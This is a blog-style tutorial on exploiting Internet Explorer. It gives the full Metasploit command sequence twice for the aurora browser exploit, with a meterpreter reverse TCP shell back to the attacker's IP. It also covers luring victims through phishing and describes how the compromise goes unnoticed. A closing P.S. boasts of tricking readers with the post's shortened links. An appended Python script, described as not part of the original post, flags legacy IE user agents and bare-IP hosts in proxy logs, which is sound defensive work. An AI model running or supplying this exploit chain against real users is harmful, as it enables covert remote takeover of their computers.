Tailored Cyber Security.

The Basics of Browser Exploitation

Saying that something is insecure doesn’t cut it for me and it shouldn’t for you. I said that Internet Explorer is something to avoid in my post “The Basics of Web Browser Security” but I never REALLY got into why. You can google around for a minute or two and find out why but I’ll run you through a quick demo to show you how easy it is to exploit someone’s computer if they use Internet Explorer. Before starting, I do have to add a caveat that this is a client side exploit. In other words, the victim would have to travel to the malicious web page we’ll create. That can be done through phishing or several other tactics that I may or may not discuss in future posts.

Exploiting Internet Explorer from start to finish:
Solid walkthrough: http://tinyurl.com/ls3p6ey

TL;DR
1. Kali Linux
2. Metasploit
  msfconsole
  use exploit/windows/browser/ms10_002_aurora
  set PAYLOAD windows/meterpreter/reverse_tcp
  set URIPATH /exploit.html
  set LHOST <YOUR IP>
  set LPORT 80
  exploit
3. Victim accesses <YOUR IP>/exploit.html
4. Meterpreter prompt = WIN!

First, the easiest way to rock is to download a copy of the ever-popular Linux hacking distro Kali. This has everything you need set up on it already. For a setup tutorial go here (http://tinyurl.com/ns9ujxl).

Next, you’ll need to pop open Metasploit’s console interface (unless you feel l337, then go with msfcli). Run the following commands:

  msfconsole
  use exploit/windows/browser/ms10_002_aurora
  set PAYLOAD windows/meterpreter/reverse_tcp
  set URIPATH /exploit.html
  set LHOST <YOUR IP>
  set LPORT 80
  exploit
 
That will start a malicious server that hosts only exploit.html on your computer! We’re utilizing a favorite of mine, the aurora exploit. If you are so inclined you can check out the code here (http://tinyurl.com/kleamnk). Essentially, the only thing this page will do is send some data to the connecting victim. That data will exploit a vulnerability in the coding of Internet Explorer and upload the meterpreter payload. Once that happens you’ll have a command line prompt to do anything ranging from uploading mimikatz to snapping pictures from a connected webcam… google meterpreter if you must.

The goal is to get the victim to unknowingly or accidentally travel to that site. We’ll get into that part another time. But what happens when a victim accesses a malicious site like the one we have? By the way, it’s an extravagantly blank page.

On the victim’s side, they will see very little to nothing if executed properly. At most, they will see a little lag in page load time on a blank page. Depending on how you got them to travel there they may get their originally requested page and continue browsing like nothing happened. However, you already know what happens on your side!
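Flip this around to the defender’s side. The two things that made the page above trivial to exploit were a legacy Internet Explorer build and a browser being steered to a bare IP address serving a single HTML page. Both show up in a web proxy log, so here is an added example (mine, not part of the original post or of Metasploit) that scans constructed proxy log lines for exactly those two indicators and grades each hit. It assumes the proxy logs in Apache/nginx combined format with the requested Host appended as a final field; the sample lines, hostnames and client IPs are all made up.

```python
import re
from ipaddress import ip_address

# Constructed sample proxy log lines (not from the original post). The
# format is Apache/nginx "combined" plus the requested host as a final
# field; the assumption is that the real proxy logs the Host header there.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2014:10:01:02 +0000] "GET /exploit.html HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 192.0.2.10
10.0.0.6 - - [12/Mar/2014:10:02:15 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 Chrome/33.0 Safari/537.36" www.example.com
10.0.0.7 - - [12/Mar/2014:10:03:44 +0000] "GET / HTTP/1.1" 200 1024 "http://intranet.example/" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)" www.example.org
"""

# One combined-format line: client, ident, user, [timestamp], "request",
# status, bytes, "referer", "user-agent", host
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)" (?P<host>\S+)$'
)

# Any "MSIE n" token identifies a legacy Internet Explorer build.
MSIE_RE = re.compile(r'\bMSIE \d')


def is_ip_literal(host):
    """True when the Host field is a bare IP address (optionally with :port)."""
    try:
        if host.startswith('['):            # bracketed IPv6 literal, e.g. [2001:db8::1]:80
            candidate = host[1:host.index(']')]
        else:
            candidate = host.split(':')[0]  # drop an optional :port from an IPv4 host
        ip_address(candidate)
        return True
    except ValueError:                      # not an IP address at all
        return False


def analyze(log_text):
    """Return one finding per suspicious request, in log order."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                        # skip lines that do not parse
        reasons = []
        if MSIE_RE.search(m['ua']):
            reasons.append('legacy-ie-user-agent')
        if is_ip_literal(m['host']):
            reasons.append('ip-literal-host')
        if not reasons:
            continue
        findings.append({
            'client': m['client'],
            'host': m['host'],
            'path': m['path'],
            'reasons': reasons,
            # a legacy browser fetching a page from a bare IP is the pattern this post describes
            'severity': 'high' if len(reasons) == 2 else 'medium',
        })
    return findings


if __name__ == '__main__':
    for f in analyze(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['client']} -> {f['host']}{f['path']} {f['reasons']}")
```

On the constructed sample this flags the first client as high (old IE hitting a bare IP) and the third as medium (old IE still in use, which is the patch-and-upgrade finding on its own), and passes the Chrome request through. Point it at a real proxy export and the medium hits are your browser inventory; the high hits are the ones to pull the page for.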

P.S. I utilized a method to get clicks from unsuspecting users right here in this post!
